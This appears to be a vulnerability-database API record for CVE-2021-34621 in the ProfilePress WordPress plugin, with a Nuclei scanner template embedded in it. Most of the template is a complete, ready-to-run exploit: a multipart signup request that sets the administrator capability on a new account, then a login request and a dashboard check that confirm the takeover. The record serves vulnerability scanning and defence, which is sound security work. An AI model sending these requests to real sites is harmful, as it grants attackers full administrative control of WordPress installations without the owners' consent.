{"_links":{"capec":{"href":"/api/v1/vulnerability/cve-2021-34621/capec"},"cvss":{"href":"/api/v1/vulnerability/cve-2021-34621/cvss"},"cwe":{"href":"/api/v1/vulnerability/cve-2021-34621/cwe"},"enrichment":{"href":"/api/v1/vulnerability/cve-2021-34621/enrichment"},"gcve":{"href":"/api/v1/vulnerability/cve-2021-34621/gcve"},"self":{"href":"/api/v1/vulnerability/cve-2021-34621"},"sightings":{"href":"/api/v1/sightings/cve-2021-34621"}},"data":{"nuclei":true,"nuclei_template":"http/cves/2021/CVE-2021-34621.yaml","nuclei_template_severity":"critical","nuclei_template_yaml":"id: CVE-2021-34621\n\ninfo:\n  name: WordPress ProfilePress  3.0.0-3.1.3 - Admin User Creation Weakness\n  author: 0xsapra\n  severity: critical\n  description: ProfilePress WordPress plugin  is susceptible to a vulnerability in the user registration component in the ~/src/Classes/RegistrationAuth.php file that makes it possible for users to register on sites as an administrator.\n  impact: |\n    An attacker can exploit this vulnerability to create unauthorized admin accounts and gain full control over the WordPress site.\n  remediation: |\n    Update to the latest version of ProfilePress to fix the admin user creation weakness.\n  reference:\n    - https://www.wordfence.com/blog/2021/06/easily-exploitable-critical-vulnerabilities-patched-in-profilepress-plugin\n    - https://nvd.nist.gov/vuln/detail/CVE-2021-34621\n    - https://www.wordfence.com/blog/2021/06/easily-exploitable-critical-vulnerabilities-patched-in-profilepress-plugin/\n    - http://packetstormsecurity.com/files/163973/WordPress-ProfilePress-3.1.3-Privilege-Escalation.html\n  classification:\n    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n    cvss-score: 9.8\n    cve-id: CVE-2021-34621\n    cwe-id: CWE-306,CWE-269\n    epss-score: 0.68862\n    epss-percentile: 0.99325\n    cpe: cpe:2.3:a:properfraction:profilepress:*:*:*:*:*:wordpress:*:*\n  metadata:\n    max-request: 3\n    vendor: properfraction\n    product: profilepress\n    framework: wordpress\n  tags: cve2021,cve,wordpress,wp-plugin,packetstorm,intrusive,properfraction,vkev,vuln\n\nhttp:\n  - raw:\n      - |\n        POST /wp-admin/admin-ajax.php HTTP/1.1\n        Host: {{Hostname}}\n        Accept: application/json, text/javascript, */*; q=0.01\n        Content-Type: multipart/form-data; boundary=---------------------------138742543134772812001999326589\n        Origin: {{BaseURL}}\n        Referer: {{BaseURL}}\n\n        -----------------------------138742543134772812001999326589\n        Content-Disposition: form-data; name=\"reg_username\"\n\n        {{randstr}}\n        -----------------------------138742543134772812001999326589\n        Content-Disposition: form-data; name=\"reg_email\"\n\n        {{randstr}}@interact.sh\n        -----------------------------138742543134772812001999326589\n        Content-Disposition: form-data; name=\"reg_password\"\n\n        {{randstr}}@interact.sh\n        -----------------------------138742543134772812001999326589\n        Content-Disposition: form-data; name=\"reg_password_present\"\n\n        true\n        -----------------------------138742543134772812001999326589\n        Content-Disposition: form-data; name=\"reg_first_name\"\n\n        {{randstr}}@interact.sh\n        -----------------------------138742543134772812001999326589\n        Content-Disposition: form-data; name=\"reg_last_name\"\n\n        {{randstr}}@interact.sh\n        -----------------------------138742543134772812001999326589\n        Content-Disposition: form-data; name=\"_wp_http_referer\"\n\n        /wp/?page_id=18\n        -----------------------------138742543134772812001999326589\n        Content-Disposition: form-data; name=\"pp_current_url\"\n\n        {{BaseURL}}\n        -----------------------------138742543134772812001999326589\n        Content-Disposition: form-data; name=\"wp_capabilities[administrator]\"\n\n        1\n        -----------------------------138742543134772812001999326589\n        Content-Disposition: form-data; name=\"signup_form_id\"\n\n        1\n        -----------------------------138742543134772812001999326589\n        Content-Disposition: form-data; name=\"signup_referrer_page\"\n\n\n        -----------------------------138742543134772812001999326589\n        Content-Disposition: form-data; name=\"action\"\n\n        pp_ajax_signup\n        -----------------------------138742543134772812001999326589\n        Content-Disposition: form-data; name=\"melange_id\"\n\n\n        -----------------------------138742543134772812001999326589--\n      - |\n        POST /wp-login.php HTTP/1.1\n        Host: {{Hostname}}\n        Accept: application/json, text/javascript, */*; q=0.01\n        Content-Type: application/x-www-form-urlencoded; charset=UTF-8\n        Origin: {{BaseURL}}\n        Referer: {{BaseURL}}\n\n        log={{randstr}}@interact.sh&pwd={{randstr}}@interact.sh&wp-submit=Log+In\n      - |\n        GET /wp-admin/ HTTP/1.1\n        Host: {{Hostname}}\n        Accept: */*\n        Connection: close\n\n    matchers-condition: and\n    matchers:\n      - type: word\n        part: body\n        words:\n          - Welcome to your WordPress Dashboard\n\n      - type: status\n        status:\n          - 200\n# digest: 4a0a00473045022100b2e828b51868f618f868d4a6f9fe4cb1fa05e9fc296e802a874779cb53552b1a022025d58c84680415785b1158b5b5209b5058da09589932f7f1ac4adca2d7eb98d3:922c64590222798bb761d5b6d8e72950"},"source":"nuclei","vuln_id":"cve-2021-34621"}